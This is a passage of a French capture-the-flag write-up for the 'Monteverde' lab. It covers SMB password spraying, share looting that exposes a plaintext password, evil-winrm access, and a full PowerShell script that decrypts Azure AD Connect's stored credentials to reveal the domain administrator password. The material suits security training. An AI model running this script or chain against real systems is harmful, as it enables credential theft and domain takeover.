MEGABANK.LOCAL<span class="se">\s</span>vc-ata:svc-ata STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>vc-bexec:svc-bexec STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>vc-netapp:svc-netapp STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\d</span>galanos:dgalanos STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\r</span>oleary:roleary STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>morgan:smorgan STATUS_LOGON_FAILURE </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-and-azure_uploads-smb-shares--read-access">&lsquo;user$&rsquo; and &lsquo;azure_uploads&rsquo; smb shares : READ ACCESS </h3><p>Avec smbmap on trouve le share &lsquo;user$&rsquo; et &lsquo;azure_uploads&rsquo; accessibles en lecture :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbmap -H <span class="s2">&#34;10.10.10.172&#34;</span> -u SABatchJobs -p SABatchJobs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ________ ___ ___ _______ ___ ___ __ _______ </span></span><span class="line"><span class="cl"> /<span class="s2">&#34; )|&#34;</span> <span class="se">\ </span>/<span class="s2">&#34; || _ &#34;</span><span class="se">\ </span><span class="p">|</span><span class="s2">&#34; \ /&#34;</span> <span class="p">|</span> /<span class="s2">&#34;&#34;</span><span class="se">\ </span> <span class="p">|</span> __ <span class="s2">&#34;\ </span></span></span><span class="line"><span class="cl"><span class="s2"> (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) </span></span></span><span class="line"><span class="cl"><span class="s2"> \___ \ /\ \/. ||: \/ /\ \/. | /&#39; /\ \ |: ____/ </span></span></span><span class="line"><span class="cl"><span class="s2"> __/ \ |: \. |(| _ \ |: \. | // __&#39; \ (| / </span></span></span><span class="line"><span class="cl"><span class="s2"> /&#34;</span> <span class="se">\ </span> :<span class="o">)</span> <span class="p">|</span>. <span class="se">\ </span>/: <span class="o">||</span>: <span class="p">|</span>_<span class="o">)</span> :<span class="o">)</span><span class="p">|</span>. <span class="se">\ </span>/: <span class="p">|</span> / / <span class="se">\ </span> <span class="se">\ </span> /<span class="p">|</span>__/ <span class="se">\ </span></span></span><span class="line"><span class="cl"> <span class="o">(</span>_______/ <span class="p">|</span>___<span class="p">|</span><span class="se">\_</span>_/<span class="p">|</span>___<span class="p">|</span><span class="o">(</span>_______/ <span class="p">|</span>___<span class="p">|</span><span class="se">\_</span>_/<span class="p">|</span>___<span class="p">|</span><span class="o">(</span>___/ <span class="se">\_</span>__<span class="o">)(</span>_______<span class="o">)</span> </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">SMBMap - Samba Share Enumerator v1.10.7 <span class="p">|</span> Shawn Evans - ShawnDEvans@gmail.com </span></span><span class="line"><span class="cl"> https://github.com/ShawnDEvans/smbmap </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Detected <span class="m">1</span> hosts serving SMB </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Established <span class="m">1</span> SMB connections<span class="o">(</span>s<span class="o">)</span> and <span class="m">1</span> authenticated session<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> IP: 10.10.10.172:445 Name: MEGABANK.LOCAL Status: Authenticated </span></span><span class="line"><span class="cl"> Disk Permissions Comment </span></span><span class="line"><span class="cl"> ---- ----------- ------- </span></span><span class="line"><span class="cl"> ADMIN$ NO ACCESS Remote Admin </span></span><span class="line"><span class="cl"> azure_uploads READ ONLY </span></span><span class="line"><span class="cl"> C$ NO ACCESS Default share </span></span><span class="line"><span class="cl"> E$ NO ACCESS Default share </span></span><span class="line"><span class="cl"> IPC$ READ ONLY Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON READ ONLY Logon server share </span></span><span class="line"><span class="cl"> SYSVOL READ ONLY Logon server share </span></span><span class="line"><span class="cl"> users$ READ ONLY </span></span></code></pre></td></tr></table> </div> </div><p>On remarque que azure_uploads est vide.</p> <p>Dans users$ on trouve le dossier d&rsquo;un autre utilisateur &ldquo;<strong>mhope</strong>&rdquo; avec un fichier <code>azure.xml</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ smbclient //10.10.10.172/users$ -U MEGABANK.LOCAL/SABatchJobs </span></span><span class="line"><span class="cl">Password <span class="k">for</span> <span class="o">[</span>MEGABANK.LOCAL<span class="se">\S</span>ABatchJobs<span class="o">]</span>: </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:48 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:48 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> dgalanos D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:30 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> mhope D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> roleary D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:10:30 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> smorgan D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:10:24 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">31999</span> blocks of size 4096. <span class="m">28979</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> mhope </span></span><span class="line"><span class="cl">smb: <span class="se">\m</span>hope<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> azure.xml AR <span class="m">1212</span> Fri Jan <span class="m">3</span> 14:40:23 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">31999</span> blocks of size 4096. <span class="m">28979</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\m</span>hope<span class="se">\&gt;</span> get azure.xml </span></span><span class="line"><span class="cl">getting file <span class="se">\m</span>hope<span class="se">\a</span>zure.xml of size <span class="m">1212</span> as azure.xml <span class="o">(</span>15.0 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 15.0 KiloBytes/sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>Dans ce fichier se trouve un mot de passe <code>4n0therD4y@n0th3r$</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat azure.xml </span></span><span class="line"><span class="cl">��&lt;Objs <span class="nv">Version</span><span class="o">=</span><span class="s2">&#34;1.1.0.1&#34;</span> <span class="nv">xmlns</span><span class="o">=</span><span class="s2">&#34;http://schemas.microsoft.com/powershell/2004/04&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;Obj <span class="nv">RefId</span><span class="o">=</span><span class="s2">&#34;0&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;TN <span class="nv">RefId</span><span class="o">=</span><span class="s2">&#34;0&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;T&gt;Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential&lt;/T&gt; </span></span><span class="line"><span class="cl"> &lt;T&gt;System.Object&lt;/T&gt; </span></span><span class="line"><span class="cl"> &lt;/TN&gt; </span></span><span class="line"><span class="cl"> &lt;ToString&gt;Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential&lt;/ToString&gt; </span></span><span class="line"><span class="cl"> &lt;Props&gt; </span></span><span class="line"><span class="cl"> &lt;DT <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;StartDate&#34;</span>&gt;2020-01-03T05:35:00.7562298-08:00&lt;/DT&gt; </span></span><span class="line"><span class="cl"> &lt;DT <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;EndDate&#34;</span>&gt;2054-01-03T05:35:00.7562298-08:00&lt;/DT&gt; </span></span><span class="line"><span class="cl"> &lt;G <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;KeyId&#34;</span>&gt;00000000-0000-0000-0000-000000000000&lt;/G&gt; </span></span><span class="line"><span class="cl"> &lt;S <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;Password&#34;</span>&gt;4n0therD4y@n0th3r$&lt;/S&gt; </span></span><span class="line"><span class="cl"> &lt;/Props&gt; </span></span><span class="line"><span class="cl"> &lt;/Obj&gt; </span></span><span class="line"><span class="cl">&lt;/Objs&gt;# </span></span></code></pre></td></tr></table> </div> </div><h3 id="evil-winrm--mhope---user-flag">Evil-winrm : mhope -&gt; user flag </h3><p>On obtient un accès via evil winrm en tant que <strong>mhope</strong> avec le mot de passe trouvé précédemment <code>4n0therD4y@n0th3r$</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -u mhope -p <span class="s1">&#39;4n0therD4y@n0th3r$&#39;</span> -i <span class="s2">&#34;10.10.10.172&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>esktop&gt; cat <span class="s2">&#34;C:/Users/mhope/Desktop/user.txt&#34;</span> </span></span><span class="line"><span class="cl">4437.....5f01 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mhope-group--azure-admins">mhope Group : Azure Admins </h3><p>On observe que mhope fait partie du groupe <code>Azure Admins</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; whoami /groups </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GROUP INFORMATION </span></span><span class="line"><span class="cl">----------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Group Name Type SID <span class="nv">Attributes</span> </span></span><span class="line"><span class="cl"><span class="o">=======================================</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">MEGABANK<span class="se">\A</span>zure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="sql-server-adsync-database">SQL Server: ADSync database </h3><p>On observer une processus &ldquo;sqlservr&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; Get-Process sqlservr </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Handles NPM<span class="o">(</span>K<span class="o">)</span> PM<span class="o">(</span>K<span class="o">)</span> WS<span class="o">(</span>K<span class="o">)</span> CPU<span class="o">(</span>s<span class="o">)</span> Id SI ProcessName </span></span><span class="line"><span class="cl">------- ------ ----- ----- ------ -- -- ----------- </span></span><span class="line"><span class="cl"> <span class="m">832</span> <span class="m">114</span> <span class="m">406004</span> <span class="m">275560</span> <span class="m">3436</span> <span class="m">0</span> sqlservr </span></span></code></pre></td></tr></table> </div> </div><p>On remarque que <strong>sqlcmd</strong> est installé et on observe une base de donnée &ldquo;ADSync&rdquo;. On peut bien effectuer des requêtes vers la base de donnée sans utiliser de user/password :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; sqlcmd -Q <span class="s1">&#39;SELECT name FROM sys.databases&#39;</span> </span></span><span class="line"><span class="cl">name </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">master </span></span><span class="line"><span class="cl">tempdb </span></span><span class="line"><span class="cl">model </span></span><span class="line"><span class="cl">msdb </span></span><span class="line"><span class="cl">ADSync </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">(</span><span class="m">5</span> rows affected<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="script">Script </h3><p>On trouve un script de <code>xpn</code> sur github. Ce script permet de se connecter à la base de donnée <code>ADSync</code>, d&rsquo;extraire la configuration (chiffrée), puis de la déchiffrer. On obtient alors le mot de passe de l&rsquo;administrator. Le script est basé sur l&rsquo;utilisation des infos de la base de données puis du binaire &lsquo;C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll&rsquo; pour réussir à récupérer la configuration contenant les creds administrateur :</p> <p><a class="link" href="https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545" target="_blank" rel="noopener" >https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545</a></p> <p>En utilisant le script, on remarque qu&rsquo;il ne fonctionne pas. Les lignes de code permettant la connection à la base de données semblent incorrectes :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; <span class="nv">$client</span> <span class="o">=</span> new-object System.Data.SqlClient.SqlConnection -ArgumentList <span class="s2">&#34;Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.Open<span class="o">()</span> </span></span></code></pre></td></tr></table> </div> </div><p>En cherchant sur internet, j&rsquo;ai pu corriger la ligne de code permettant la connexion à la bdd. De plus, j&rsquo;ai pu remarquer certaines erreurs avec des guillemets dans un format suspect. J&rsquo;ai bien remplacé les guillemets par &ldquo;&rsquo;&rdquo; ou &lsquo;&quot;&rsquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Write-Host <span class="s2">&#34;AD Connect Sync Credential Extract POC&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$SQLServer</span> <span class="o">=</span> <span class="s2">&#34;127.0.0.1&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$SQLDBName</span> <span class="o">=</span> <span class="s2">&#34;ADSync&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span> <span class="o">=</span> New-Object System.Data.SqlClient.SqlConnection </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.ConnectionString <span class="o">=</span> <span class="s2">&#34;Server = </span><span class="nv">$SQLServer</span><span class="s2">; Database = </span><span class="nv">$SQLDBName</span><span class="s2">; Integrated Security = True&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.Open<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span> <span class="o">=</span> <span class="nv">$client</span>.CreateCommand<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span>.CommandText <span class="o">=</span> <span class="s2">&#34;SELECT keyset_id, instance_id, entropy FROM mms_server_configuration&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span> <span class="o">=</span> <span class="nv">$cmd</span>.ExecuteReader<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Read<span class="o">()</span> <span class="p">|</span> Out-Null </span></span><span class="line"><span class="cl"><span class="nv">$key_id</span> <span class="o">=</span> <span class="nv">$reader</span>.GetInt32<span class="o">(</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$instance_id</span> <span class="o">=</span> <span class="nv">$reader</span>.GetGuid<span class="o">(</span>1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$entropy</span> <span class="o">=</span> <span class="nv">$reader</span>.GetGuid<span class="o">(</span>2<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Close<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span> <span class="o">=</span> <span class="nv">$client</span>.CreateCommand<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span>.CommandText <span class="o">=</span> <span class="s2">&#34;SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = &#39;AD&#39;&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span> <span class="o">=</span> <span class="nv">$cmd</span>.ExecuteReader<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Read<span class="o">()</span> <span class="p">|</span> Out-Null </span></span><span class="line"><span class="cl"><span class="nv">$config</span> <span class="o">=</span> <span class="nv">$reader</span>.GetString<span class="o">(</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$crypted</span> <span class="o">=</span> <span class="nv">$reader</span>.GetString<span class="o">(</span>1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Close<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">add-type -path <span class="s1">&#39;C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll&#39;</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span> <span class="o">=</span> New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.LoadKeySet<span class="o">(</span><span class="nv">$entropy</span>, <span class="nv">$instance_id</span>, <span class="nv">$key_id</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$key</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.GetActiveCredentialKey<span class="o">([</span>ref<span class="o">]</span><span class="nv">$key</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$key2</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.GetKey<span class="o">(</span>1, <span class="o">[</span>ref<span class="o">]</span><span class="nv">$key2</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$decrypted</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$key2</span>.DecryptBase64ToString<span class="o">(</span><span class="nv">$crypted</span>, <span class="o">[</span>ref<span class="o">]</span><span class="nv">$decrypted</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Write-Host <span class="nv">$decrypted</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$domain</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$config</span> -XPath <span class="s2">&#34;//parameter[@name=&#39;forest-login-domain&#39;]&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Domain&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"><span class="nv">$username</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$config</span> -XPath <span class="s2">&#34;//parameter[@name=&#39;forest-login-user&#39;]&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Username&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"><span class="nv">$password</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$decrypted</span> -XPath <span class="s2">&#34;//attribute&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Password&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Domain: &#34;</span> + <span class="nv">$domain</span>.Domain<span class="o">)</span> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Username: &#34;</span> + <span class="nv">$username</span>.Username<span class="o">)</span> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Password: &#34;</span> + <span class="nv">$password</span>.Password<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="output">Output </h3><p>Après correction des guillements, on execute le .ps1 et obtient les creds admin :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; .<span class="se">\d</span>ecrypt.ps1 </span></span><span class="line"><span class="cl">AD Connect Sync Credential Extract POC </span></span><span class="line"><span class="cl">&lt;encrypted-attributes&gt; </span></span><span class="line"><span class="cl"> &lt;attribute <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;password&#34;</span>&gt;d0m@in4dminyeah!&lt;/attribute&gt; </span></span><span class="line"><span class="cl">&lt;/encrypted-attributes&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Domain: MEGABANK.LOCAL </span></span><span class="line"><span class="cl">Username: administrator </span></span><span class="line"><span class="cl">Password: d0m@in4dminyeah! </span></span></code></pre></td></tr></table> </div> </div><h3 id="administrator-pwned">Administrator pwned </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>Jul 20, <span class="m">2025</span> - 14:56:12 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Monteverde <span class="c1"># evil-winrm -u &#34;administrator&#34; -p &#39;d0m@in4dminyeah!&#39; -i 10.10.10.172</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span 